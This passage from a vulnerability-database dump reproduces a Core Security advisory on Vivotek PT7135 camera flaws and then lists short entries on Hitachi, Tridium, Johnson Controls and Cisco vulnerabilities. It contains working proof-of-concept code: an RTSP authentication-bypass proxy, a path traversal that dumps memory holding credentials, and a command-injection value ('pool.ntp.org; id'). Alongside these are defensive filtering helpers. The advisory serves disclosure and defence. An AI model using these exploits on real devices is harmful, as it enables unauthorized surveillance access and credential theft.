auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
    s = socket.socket()
    s.connect((cam_ip, 554))
    print s.send(msg)
    print s.recv(0x10000)
    s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
The camera answers an unauthenticated DESCRIBE request with '401
Unauthorized'; the script below gets around that check by running a local
TCP proxy between the attacker's RTSP client and the camera. It records
the client's DESCRIBE and, when the camera's 401 arrives, replaces it with
a forged '200 OK' that carries a canned SDP description (taken from a
PT7135 running firmware 0400a) and the client's CSeq. The SETUP and PLAY
requests that follow are forwarded unchanged, and a UDP relay is started
for each server_port the camera announces so the RTP/RTCP packets reach
the client. As a result, the video stream can be accessed by an
unauthenticated remote attacker.
/-----
# Python 2 PoC: local RTSP proxy that forges the DESCRIBE reply
import sys
from socket import *
from threading import Thread
import time, re

LOGGING = 1


def log(s):
    if LOGGING:
        print '(%s) %s' % (time.ctime(), s)


class UDPRequestHandler(Thread):
    # Forwards one UDP datagram to the camera and relays the answer back
    def __init__(self, data_to_send, recv_addr, dst_addr):
        Thread.__init__(self)
        self.data_to_send = data_to_send
        self.recv_addr = recv_addr
        self.dst_addr = dst_addr

    def run(self):
        sender = socket(AF_INET, SOCK_DGRAM)
        sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        sender.sendto(self.data_to_send, self.dst_addr)
        response = sender.recv(1024)
        sender.sendto(response, self.recv_addr)
        sender.close()


class UDPDispatcher(Thread):
    # One listener per RTP/RTCP port announced by the camera
    dispatchers = []

    def __has_dispatcher_for(self, port):
        return any([d.src_port == port for d in UDPDispatcher.dispatchers])

    def __init__(self, src_port, dst_addr):
        Thread.__init__(self)
        if self.__has_dispatcher_for(src_port):
            raise Exception('There is already a dispatcher for port %d' % src_port)
        self.src_port = src_port
        self.dst_addr = dst_addr
        UDPDispatcher.dispatchers.append(self)

    def run(self):
        listener = socket(AF_INET, SOCK_DGRAM)
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind(('', self.src_port))
        while 1:
            try:
                data, recv_addr = listener.recvfrom(1024)
                if not data: break
                UDPRequestHandler(data, recv_addr, self.dst_addr).start()
            except Exception as e:
                print e
                break
        listener.close()
        UDPDispatcher.dispatchers.remove(self)


class PipeThread(Thread):
    # Copies data from source to sink, running each chunk through a callback
    pipes = []

    def __init__(self, source, sink, process_data_callback=lambda x: x):
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.process_data_callback = process_data_callback
        PipeThread.pipes.append(self)

    def run(self):
        while 1:
            try:
                data = self.source.recv(1024)
                data = self.process_data_callback(data)
                if not data: break
                self.sink.send(data)
            except Exception as e:
                log(e)
                break
        PipeThread.pipes.remove(self)


class TCPTunnel(Thread):
    # Accepts RTSP clients locally and pipes them to the camera both ways
    def __init__(self, src_port, dst_addr, process_data_callback=lambda x: x):
        Thread.__init__(self)
        log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port, dst_addr[0], dst_addr[1]))
        self.dst_addr = dst_addr
        self.process_data_callback = process_data_callback
        # Create TCP listener socket
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', src_port))
        self.sock.listen(5)

    def run(self):
        while 1:
            # Wait until a new connection arises
            newsock, address = self.sock.accept()
            # Create forwarder socket
            fwd = socket(AF_INET, SOCK_STREAM)
            fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
            fwd.connect(self.dst_addr)
            # Pipe them!
            PipeThread(newsock, fwd, self.process_data_callback).start()
            PipeThread(fwd, newsock, self.process_data_callback).start()


class Camera():
    def __init__(self, address):
        self.address = address

    def get_describe_data(self):
        return ''


class Vivotek(Camera):
    # Vivotek PT7135/0400a
    def __init__(self, address):
        Camera.__init__(self, address)

    def get_describe_data(self):
        # Canned SDP as served by the camera to an authenticated client
        return ('v=0\r\n'
                'o=RTSP 836244 0 IN IP4 0.0.0.0\r\n'
                's=RTSP server\r\n'
                'c=IN IP4 0.0.0.0\r\n'
                't=0 0\r\n'
                'a=charset:Shift_JIS\r\n'
                'a=range:npt=0-\r\n'
                'a=control:*\r\n'
                'a=etag:1234567890\r\n'
                'm=video 0 RTP/AVP 96\r\n'
                'b=AS:1200\r\n'
                'a=rtpmap:96 MP4V-ES/30000\r\n'
                'a=control:trackID=1\r\n'
                'a=fmtp:96 profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\n'
                'm=audio 0 RTP/AVP 97\r\n'
                'a=control:trackID=3\r\n'
                'a=rtpmap:97 mpeg4-generic/16000/2\r\n'
                'a=fmtp:97 streamtype=5; profile-level-id=15; mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3; IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n')


class RTSPAuthByPasser():
    DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
    UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
    SERVER_PORT_ARGUMENTS = 'server_port='
    DEFAULT_CSEQ = 1
    DEFAULT_SERVER_PORT_RANGE = '5556-5559'

    def __init__(self, local_port, camera):
        self.last_describe_req = ''
        self.camera = camera
        self.local_port = local_port

    def start(self):
        log('[!] Starting bypasser')
        TCPTunnel(self.local_port, self.camera.address,
                  self.spoof_rtsp_conn).start()

    def spoof_rtsp_conn(self, data):
        # Called for every chunk in both directions of the tunnel
        if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
            # Remember the client's DESCRIBE so its CSeq can be reused
            self.last_describe_req = data
        elif (RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
              self.last_describe_req):
            log('[!] Unauthorized response received. Spoofing...')
            spoofed_describe = self.camera.get_describe_data()
            # Look for the request CSeq
            m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*', self.last_describe_req)
            cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
            # Create the response
            data = 'RTSP/1.0 200 OK\r\n'
            data += 'CSeq: %s\r\n' % cseq
            data += 'Content-Type: application/sdp\r\n'
            data += 'Content-Length: %d\r\n' % len(spoofed_describe)
            data += '\r\n'
            # Attach the spoofed describe
            data += spoofed_describe
        elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
            # Look for the server RTP ports
            m = re.search('.*%s\\s*(.+?)[;|\r].*' %
                          RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
            ports = m.group(1) if m else RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
            # For each port in the range create a UDP dispatcher
            begin_port, end_port = map(int, ports.split('-'))
            for udp_port in xrange(begin_port, end_port + 1):
                try:
                    UDPDispatcher(udp_port, (self.camera.address[0], udp_port)).start()
                except:
                    pass  # a dispatcher for this port already exists
        return data


if __name__ == '__main__':
    if len(sys.argv) >= 3:
        listener_port = camera_port = int(sys.argv[1])
        camera_ip = sys.argv[2]
        if len(sys.argv) == 4:
            camera_port = int(sys.argv[3])
        RTSPAuthByPasser(listener_port, Vivotek((camera_ip, camera_port))).start()
    else:
        print 'usage: python %s [local_port] [camera_ip] [camera_rtsp_port]' % sys.argv[0]
-----/
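The helpers below are an added example and not part of the Core advisory: Python 3 functions that reproduce the message-level logic of the PoCs in Sec. 8.2 and Sec. 8.3 so it can be exercised offline on constructed RTSP messages. Sec. 8.2 is covered by a length check on the Basic Authorization credential, the kind of filter a proxy in front of TCP port 554 (Sec. 6) could apply; Sec. 8.3 by the forged DESCRIBE reply, which copies the client's CSeq, and by the server_port parsing the bypasser relies on to open its UDP relays. The function names, the 256-byte threshold and the sample messages are assumptions made here, not values from the advisory; the SDP body in the demo is a shortened form of the one in the PoC.

```python
import re
from typing import Dict, Optional, Tuple

# Assumed threshold for a filtering proxy in front of the camera (Sec. 6);
# a real Basic credential, base64(user:password), is a few dozen bytes.
MAX_BASIC_AUTH_LEN = 256


def parse_rtsp_message(raw: bytes) -> Tuple[bytes, Dict[str, bytes]]:
    """Split an RTSP request or response into (start line, headers).

    Header names become lower-cased str keys; values are stripped bytes.
    Only the head up to the blank line is parsed, so any body is ignored.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        if b":" not in line:
            continue  # tolerate a malformed header line instead of crashing
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return lines[0], headers


def oversized_basic_authorization(raw: bytes, limit: int = MAX_BASIC_AUTH_LEN) -> bool:
    """Sec. 8.2: flag a request whose Basic credential exceeds `limit` bytes.

    The PoC sends 1000 and 10000 bytes of 'a'; a proxy can drop such
    requests before they reach the camera's RTSP service on TCP port 554.
    """
    _, headers = parse_rtsp_message(raw)
    auth = headers.get("authorization")
    if auth is None:
        return False
    scheme, _, credential = auth.partition(b" ")
    return scheme.strip().lower() == b"basic" and len(credential.strip()) > limit


def build_spoofed_describe_response(describe_req: bytes, sdp: bytes) -> bytes:
    """Sec. 8.3: forge the '200 OK' returned in place of the camera's 401.

    The CSeq is copied from the client's DESCRIBE so the client pairs the
    reply with its request; a DESCRIBE without a numeric CSeq falls back
    to 1, as in the advisory's PoC.
    """
    _, headers = parse_rtsp_message(describe_req)
    cseq = headers.get("cseq", b"1")
    if not re.fullmatch(rb"\d+", cseq):
        cseq = b"1"
    head = [
        b"RTSP/1.0 200 OK",
        b"CSeq: " + cseq,
        b"Content-Type: application/sdp",
        b"Content-Length: %d" % len(sdp),
        b"",
        b"",
    ]
    return b"\r\n".join(head) + sdp


def parse_server_port_range(transport_value: bytes) -> Optional[Tuple[int, int]]:
    """Sec. 8.3: read the camera's RTP/RTCP ports from a SETUP reply's
    Transport header so UDP relays can be opened for them.

    b'RTP/AVP;unicast;client_port=5556-5557;server_port=6970-6971' -> (6970, 6971)
    A single port yields (p, p); a missing or inverted range yields None.
    """
    m = re.search(rb"server_port=(\d+)(?:-(\d+))?", transport_value)
    if not m:
        return None
    lo = int(m.group(1))
    hi = int(m.group(2)) if m.group(2) else lo
    return (lo, hi) if lo <= hi else None


def demo() -> Tuple[bool, bytes, Optional[Tuple[int, int]]]:
    """Run the helpers over constructed messages (not captured traffic)."""
    overflow_req = (b"DESCRIBE rtsp://192.168.1.100/live.sdp RTSP/1.0\r\n"
                    b"CSeq: 1\r\n"
                    b"Authorization: Basic " + b"a" * 1000 + b"\r\n\r\n")
    describe_req = (b"DESCRIBE rtsp://192.168.1.100/live.sdp RTSP/1.0\r\n"
                    b"CSeq: 2\r\nAccept: application/sdp\r\n\r\n")
    sdp = b"v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP server\r\n"
    setup_transport = b"RTP/AVP;unicast;client_port=5556-5557;server_port=6970-6971"
    return (oversized_basic_authorization(overflow_req),
            build_spoofed_describe_response(describe_req, sdp),
            parse_server_port_range(setup_transport))


if __name__ == "__main__":
    flagged, forged, ports = demo()
    print("oversized Authorization:", flagged)
    print(forged.decode())
    print("camera RTP/RTCP ports:", ports)
```

Running the file prints the three results. The forged reply only works because RTSP clients pair responses to requests by CSeq, which is why the PoC parses it out of the recorded DESCRIBE before answering; the length check is deliberately conservative, since nothing legitimate puts hundreds of bytes into a Basic credential.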
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
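As an added example (not the advisory's code, and not Vivotek's), the filter that Sec. 6 recommends placing in a proxy in front of the camera, applied to the traversal in Sec. 8.4 and to the leaking URLs in Sec. 8.1. It is written in Python 3 for a generic HTTP reverse proxy; the web root '/var/www', the function names and the demo request paths are assumptions made here. The point it makes is that the raw path must be percent-decoded and normalized before matching, otherwise '%2e%2e/' slips past a filter that looks only for the literal '/../../'.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumed web root; the camera's real one is not given in the advisory
# Resources the Sec. 6 mitigation and the Sec. 8.1 URLs single out for filtering
BLOCKED_BASENAMES = {"getparam.cgi", "parafile.html"}


def normalize_request_path(path: str) -> str:
    """Drop any query string, percent-decode twice (to defeat double
    encoding), fold backslashes, and collapse '.' and '..' segments.

    The result is absolute, so '/../../../../../../../../../proc/kcore'
    becomes '/proc/kcore': the segments that climb above '/' are discarded
    instead of being handed to the file system.
    """
    decoded = unquote(unquote(path.split("?", 1)[0])).replace("\\", "/")
    return posixpath.normpath("/" + decoded.lstrip("/"))


def resolve_under_root(path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map a request path onto the file system, refusing anything whose
    normalized form escapes `root`. Returns the file path, or None if blocked."""
    norm = normalize_request_path(path)
    target = posixpath.normpath(posixpath.join(root, norm.lstrip("/")))
    if target != root and not target.startswith(root.rstrip("/") + "/"):
        return None  # unreachable after normalization; kept as defence in depth
    return target


def request_allowed(path: str) -> bool:
    """Filtering-proxy decision for one HTTP request path (Sec. 6): reject
    traversal sequences in the decoded path, reject the credential-dumping
    resources, and require the normalized path to resolve under the web root."""
    decoded = unquote(unquote(path.split("?", 1)[0])).replace("\\", "/")
    if "../" in decoded or decoded.endswith(".."):
        return False
    norm = normalize_request_path(path)
    if posixpath.basename(norm) in BLOCKED_BASENAMES:
        return False
    return resolve_under_root(path) is not None


def filter_requests(paths: List[str]) -> List[str]:
    """Apply request_allowed to a batch and return the paths that were blocked."""
    return [p for p in paths if not request_allowed(p)]


if __name__ == "__main__":
    # Constructed request paths; the first three are the advisory's own URLs (Sec. 8.1, 8.4)
    sample = ["/cgi-bin/admin/getparam.cgi", "/setup/parafile.html",
              "/../../../../../../../../../proc/kcore",
              "/%2e%2e/%2e%2e/etc/passwd", "/setup/index.html"]
    for p in sample:
        print("%-45s %s" % (p, "allow" if request_allowed(p) else "BLOCK"))
```

Note that resolve_under_root alone already confines every path to the web root, because normalization discards the climbing segments; the explicit '../' rejection exists so that a traversal attempt is logged and dropped rather than silently served as a file inside the root.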
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is in the binary 'farseer.out': the
value of the parameter 'system.ntp' is appended to the string
"/usr/sbin/psntpdate -4fr " with snprintf (maxlen 0xFF) and the result is
passed, unfiltered, to system(), as the following disassembly shows:
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ; "[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ; "/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
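The disassembly shows the root cause: the value of 'system.ntp' is appended to "/usr/sbin/psntpdate -4fr " with snprintf (maxlen 0xFF) and the result is passed to system(), so a parameter such as 'pool.ntp.org; id' runs a second command with the daemon's privileges. The Python 3 block below is an added example, not code from the advisory or from the vendor: it recasts that code path beside a hardened version that allow-lists the parameter (host name or IPv4 literal, an assumed rule, not Vivotek's fix) and invokes the binary through an argv list with no shell. The function names and the sample values are assumptions made here; the binary path and the 0xFF length come from the disassembly.

```python
import re
import subprocess
from typing import List

PSNTPDATE = "/usr/sbin/psntpdate"  # binary named in the Sec. 8.5 disassembly
SNPRINTF_MAXLEN = 0xFF             # maxlen passed to snprintf in the disassembly


def vulnerable_ntp_command(ntp_server: str) -> str:
    """Python equivalent of the farseer.out code path: snprintf("%s%s",
    "/usr/sbin/psntpdate -4fr ", value) followed by system(). Whatever the
    'system.ntp' parameter contains becomes part of a shell command line."""
    command = "%s -4fr %s" % (PSNTPDATE, ntp_server)
    return command[:SNPRINTF_MAXLEN - 1]  # snprintf keeps one byte for the NUL


# RFC 1123 host name: labels of 1-63 alphanumerics/hyphens, no leading or trailing hyphen
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def valid_ntp_server(value: str) -> bool:
    """Allow-list check for 'system.ntp': a host name or dotted IPv4, nothing else.
    Shell metacharacters, whitespace and quotes all fail this test."""
    return bool(_HOSTNAME.match(value) or _IPV4.match(value))


def safe_ntp_argv(ntp_server: str) -> List[str]:
    """Hardened form: validate the parameter, then build an argv list.
    Raises ValueError instead of ever producing a shell command line."""
    if not valid_ntp_server(ntp_server):
        raise ValueError("system.ntp is not a host name or IPv4 address")
    return [PSNTPDATE, "-4fr", ntp_server]


def ntp_value_accepted(ntp_server: str) -> bool:
    """True when safe_ntp_argv would accept the value."""
    try:
        safe_ntp_argv(ntp_server)
        return True
    except ValueError:
        return False


def run_ntp_sync(ntp_server: str) -> subprocess.CompletedProcess:
    """execve the validated argv directly; with shell=False the list is never
    re-parsed, so even a value that slipped past validation cannot chain commands."""
    return subprocess.run(safe_ntp_argv(ntp_server), shell=False, check=False)


if __name__ == "__main__":
    # Constructed parameter values: a legitimate server and an injection attempt
    for value in ("pool.ntp.org", "pool.ntp.org; id"):
        print("system.ntp=%r" % value)
        print("  system() would run :", vulnerable_ntp_command(value))
        print("  hardened path      :",
              safe_ntp_argv(value) if ntp_value_accepted(value) else "rejected")
```

The two defences are independent and both matter: the allow-list keeps ';', '`' and '$(' out of the parameter at the web interface, and the argv form removes the shell from the execution path so that, if validation is ever loosened, a metacharacter is still just a character in one argument.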
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received.
. 2013-03-11:
Core asks for a security manager to send a confidential report.
. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485).
. 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670).
. 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485.
. 2013-04-24:
Core tries to contact the vendor for the last time, without any reply.
. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476
[3] Alejandro Leon Morales [Gothicx], http://www.undermx.blogspot.mx
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-201207-0605 | No CVE | Hitachi JP1 Unknown Privilege Elevation Vulnerability in Multiple Products |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1 has security vulnerabilities in multiple products that allow malicious local users to elevate privileges. The flaw lies in the setup package manager; no further details of the vulnerability have been published.
Local attackers can exploit this issue to gain escalated privileges.
----------------------------------------------------------------------
TITLE:
Hitachi JP1 Products Unspecified Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA49907
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49907/
RELEASE DATE:
2012-07-13
DESCRIPTION:
A vulnerability has been reported in multiple Hitachi JP1 products,
which can be exploited by malicious, local users to gain escalated
privileges.
The vulnerability is caused due to an unspecified error within the
setup package manager. No further details are currently available.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply patches (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Hitachi (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/./vuls/HS12-020/index.html
| VAR-201207-0105 | CVE-2012-4028 | Tridium Niagara AX Framework Security Bypass Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Tridium Niagara AX Framework does not properly store credential data, which allows context-dependent attackers to bypass intended access restrictions by using the stored information for authentication. A vulnerability exists in the Tridium Niagara AX Framework. The vulnerability stems from a failure to properly store credential data. TRIDIUM NiagaraAX is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
----------------------------------------------------------------------
TITLE:
Niagara Framework Predictable Session Identifier Vulnerability
SECUNIA ADVISORY ID:
SA50288
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50288/
RELEASE DATE:
2012-08-16
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to hijack a user's session.
The vulnerability is caused due to predictable sessions identifiers
being used.
SOLUTION:
No official solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-228-01.pdf
| VAR-201207-0054 | CVE-2012-2607 | Johnson Controls Multiple Products Remote Command Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The Johnson Controls CK721-A controller with firmware before SSM4388_03.1.0.14_BB allows remote attackers to perform arbitrary actions via crafted packets to TCP port 41014 (aka the download port). Johnson Controls CK721-A and P2000 products contain a remote command execution vulnerability which may allow an unauthenticated remote attacker to perform various tasks against the devices. Johnson Controls is a US manufacturer of building automation and access control systems. An unauthenticated attacker can send a specially crafted message to the download port to close doors and change the configuration. The "upload" port (TCP 41013) of the P2000 (Pegasys) server is used for logging and alarm purposes; the server validates incoming messages only by their source IP address, so an attacker can send specially crafted messages to that port to feed false access data into the server.
Successfully exploiting this issue may allow an attacker to execute arbitrary commands within the context of the vulnerable system.
| VAR-201207-0104 | CVE-2012-4027 | Tridium Niagara AX Framework Directory Traversal Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Tridium Niagara AX Framework allows remote attackers to read files outside of the intended images, nav, and px folders by leveraging incorrect permissions, as demonstrated by reading the config.bog file. The Niagara Framework is a unified, open, distributed platform that integrates the management of a wide variety of devices and systems. The Niagara Framework has an input validation vulnerability that permits a directory traversal attack: unspecified input is not validated before it is used to read a file, so a crafted request can retrieve the contents of arbitrary files. TRIDIUM NiagaraAX is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
----------------------------------------------------------------------
TITLE:
Niagara Framework Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA49903
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49903/
RELEASE DATE:
2012-07-16
DESCRIPTION:
A vulnerability has been reported in Niagara Framework, which can be
exploited by malicious people to disclose system information. This can be exploited to disclose the contents of
arbitrary files via directory traversal sequences.
SOLUTION:
The vendor recommends to limit access to the affected systems.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Billy Rios and Terry McCorkle via ICS-CERT.
ORIGINAL ADVISORY:
https://www.tridium.com/galleries/briefings/NiagaraAX_Framework_Software_Security_Alert.pdf
| VAR-201207-0176 | CVE-2012-3075 | Cisco TelePresence Immersive An arbitrary command execution vulnerability in endpoint devices |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Immersive Endpoint Devices before 1.7.4 allows remote authenticated users to execute arbitrary commands via a malformed request on TCP port 443, aka Bug ID CSCtn99724. Cisco TelePresence Immersive Endpoint is a video telepresence system. Also known as Bug ID CSCtn99724.
TITLE:
Cisco TelePresence Immersive Endpoint Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49879
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49879/
RELEASE DATE:
2012-07-12
DESCRIPTION:
Some vulnerabilities have been reported in Cisco TelePresence
Immersive Endpoint devices, which can be exploited by malicious users
and malicious people to compromise a vulnerable system.
2) An error exists within the handling of Cisco Discovery Protocol
(CDP) packets.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-cts